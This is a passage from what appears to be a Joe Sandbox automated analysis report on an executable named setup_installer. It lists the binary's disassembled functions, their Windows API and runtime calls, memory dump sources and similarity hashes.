                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040B121: __EH_prolog.LIBCMT ref: 0040B126
                                          • Part of subcall function 00403089: __EH_prolog.LIBCMT ref: 0040308E
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowfreemalloc
                                        • String ID:
                                        • API String ID: 2423332413-0
                                        • Opcode ID: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
                                        • Instruction ID: f9ed70e7a4a1b4ee0be54417d9786138a5d8b1a5d5847858de7e9c53087b4eef
                                        • Opcode Fuzzy Hash: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
                                        • Instruction Fuzzy Hash: AB518371900609DFCB15EFA5C484A9EFBB4FF04314F10856FE565A72D2CB389A45CB98
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004024E0
                                          • Part of subcall function 004029F9: __EH_prolog.LIBCMT ref: 004029FE
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 00402BC1: __EH_prolog.LIBCMT ref: 00402BC6
                                          • Part of subcall function 0040264D: SetWindowTextW.USER32(?,00000000), ref: 0040268C
                                          • Part of subcall function 0040264D: ShowWindow.USER32(?,00000001,?,00000000,75C50B80,00000000,00000000), ref: 004026A0
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                          • Part of subcall function 00418A40: FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,75C50B80,00000000,00000000), ref: 00418A4A
                                          • Part of subcall function 00418A40: GetLastError.KERNEL32(?,75C50B80,00000000,00000000), ref: 00418A54
                                        Similarity
                                        • API ID: H_prolog$Window$ChangeCloseErrorExceptionFindLastNotificationShowTextThrowfreemalloc
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040E525
                                          • Part of subcall function 00410B21: __EH_prolog.LIBCMT ref: 00410B26
                                          • Part of subcall function 00410B21: _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00404A45
                                          • Part of subcall function 004048D6: GetTempPathW.KERNEL32(00000105,00000000,?,00000000), ref: 00404901
                                        Similarity
                                        • API ID: H_prologPathTemp
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040CF6C
                                          • Part of subcall function 0040D079: __EH_prolog.LIBCMT ref: 0040D07E
                                          • Part of subcall function 0040CE6F: __EH_prolog.LIBCMT ref: 0040CE74
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                          • Part of subcall function 0040CFE0: __EH_prolog.LIBCMT ref: 0040CFE5
                                          • Part of subcall function 0040D028: __EH_prolog.LIBCMT ref: 0040D02D
                                        Similarity
                                        • API ID: H_prolog$free
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040CF1B
                                          • Part of subcall function 0040CF67: __EH_prolog.LIBCMT ref: 0040CF6C
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Similarity
                                        • API ID: H_prolog$free
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 004051B3
                                          • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Similarity
                                        • API ID: H_prolog$free
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00409498
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040950A: __EH_prolog.LIBCMT ref: 0040950F
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040C9AB
                                          • Part of subcall function 0040CF16: __EH_prolog.LIBCMT ref: 0040CF1B
                                          • Part of subcall function 0040CEC5: __EH_prolog.LIBCMT ref: 0040CECA
                                        Similarity
                                        • API ID: H_prolog
                                        APIs
                                        Similarity
                                        • API ID: H_prolog
                                        APIs
                                          • Part of subcall function 00405298: FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3
                                        • CreateFileW.KERNELBASE(?,?,00000000,00000000,?,0041B558,00000000,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0), ref: 00405281
                                        Similarity
                                        • API ID: ChangeCloseCreateFileFindNotification
                                        APIs
                                          • Part of subcall function 00404DA0: GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1
                                        • DeleteFileW.KERNELBASE(?,?,0040479E,?,?,?,0000005C,?,?,75C50B80,?,00000000), ref: 0040466B
                                          • Part of subcall function 00404462: SetFileAttributesW.KERNELBASE(?,00000000,004047EE,?,75C50B80,?,00000000), ref: 00404464
                                        Similarity
                                        • API ID: File$Attributes$Delete
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004054F0
                                        Similarity
                                        • API ID: FileWrite
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00408113
                                          • Part of subcall function 0040814D: __EH_prolog.LIBCMT ref: 00408152
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        APIs
                                        • ReadFile.KERNELBASE(000000FF,?,?,00000000,00000000,000000FF,?,0040540C,?,?,00000000,?,00405432,?,?,00000000), ref: 004053D7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        APIs
                                        • FindNextFileW.KERNELBASE(000000FF,?), ref: 00404C00
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileFindNext
                                        • String ID:
                                        • API String ID: 2029273394-0
                                        APIs
                                        • SysAllocStringLen.OLEAUT32(00000000), ref: 00405C97
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AllocString
                                        • String ID:
                                        • API String ID: 2525500382-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00410E78
                                          • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                          • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                          • Part of subcall function 0040DCA3: __EH_prolog.LIBCMT ref: 0040DCA8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        APIs
                                        • FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        APIs
                                        • SetFileTime.KERNELBASE(?,?,?,?,004054CA,00000000,00000000,?,00402482,?), ref: 004054AE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FileTime
                                        • String ID:
                                        • API String ID: 1425588814-0
                                        APIs
                                        • SetCurrentDirectoryW.KERNELBASE(?,00401490,?,00000001,?,00419240,?,0041B524,;!@InstallEnd@!,?,0041B558,?,00000000,?,?,00000000), ref: 00404827
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,00000000,004047EE,?,75C50B80,?,00000000), ref: 00404464
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00000000,00000000,00404A06,00000000,?,00000000,00404A99,?,00000000), ref: 00404480
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CreateDirectory
                                        • String ID:
                                        • API String ID: 4241100979-0
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?), ref: 00406776
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00410F60), ref: 004137A1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000), ref: 00413811
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID:
                                        • API String ID: 2803490479-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00410F00), ref: 004137BC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0041382C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        APIs
                                        • free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                        • free.MSVCRT(?,?,?,00413148), ref: 00413781
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        APIs
                                          • Part of subcall function 00405FD6: GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
                                          • Part of subcall function 00405FD6: GetProcessAffinityMask.KERNEL32(00000000), ref: 00405FE2
                                        • GetSystemInfo.KERNEL32(?), ref: 0040600D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentInfoMaskSystem
                                        • String ID:
                                        • API String ID: 3251479945-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040F313
                                          • Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60
                                        • memcpy.MSVCRT ref: 0040F705
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7A1
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7B5
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7C9
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7DD
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7F1
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F805
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F819
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F82D
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F841
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F855
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F869
                                          • Part of subcall function 0040E966: _CxxThrowException.MSVCRT(?,0041DDD8), ref: 0040E979
                                        Strings
                                        Memory Dump Source
